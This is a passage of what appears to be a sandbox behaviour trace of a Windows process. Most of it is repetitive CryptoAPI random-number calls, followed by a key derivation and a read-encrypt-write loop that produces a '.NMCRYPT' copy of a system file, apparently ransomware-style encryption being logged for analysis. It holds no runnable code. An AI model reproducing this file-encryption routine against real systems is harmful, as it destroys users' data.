pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.234] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.235] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.236] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0145.236] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0145.237] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0145.237] CryptHashData (hHash=0x9ad278, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0145.237] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad738) returned 1 [0145.237] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0145.237] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0145.237] wcslen (_String="\\\\?\\") returned 0x4 [0145.237] CryptDuplicateKey (in: hKey=0x9ad738, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad7b8) returned 1 [0145.237] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0145.237] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0145.259] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=3526176) returned 1 [0145.259] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0145.260] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.278] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.278] GetLastError () returned 0x0 [0145.278] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.279] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.279] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.279] GetLastError () returned 0x0 [0145.279] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.280] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.280] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.280] GetLastError () returned 0x0 [0145.280] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.280] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.280] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.280] GetLastError () returned 0x0 [0145.280] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.280] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.280] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.280] GetLastError () returned 0x0 [0145.280] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.280] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.280] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.280] GetLastError () returned 0x0 [0145.280] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.281] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.281] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.281] GetLastError () returned 0x0 [0145.281] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.281] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.281] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.281] GetLastError () returned 0x0 [0145.281] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.281] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.281] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.281] GetLastError () returned 0x0 [0145.281] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.281] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.281] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.281] GetLastError () returned 0x0 [0145.281] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.281] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.282] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.282] GetLastError () returned 0x0 [0145.282] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.282] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.282] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.282] GetLastError () returned 0x0 [0145.282] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.282] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.282] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.282] GetLastError () returned 0x0 [0145.282] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.282] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.282] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.282] GetLastError () returned 0x0 [0145.282] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.282] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.282] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: 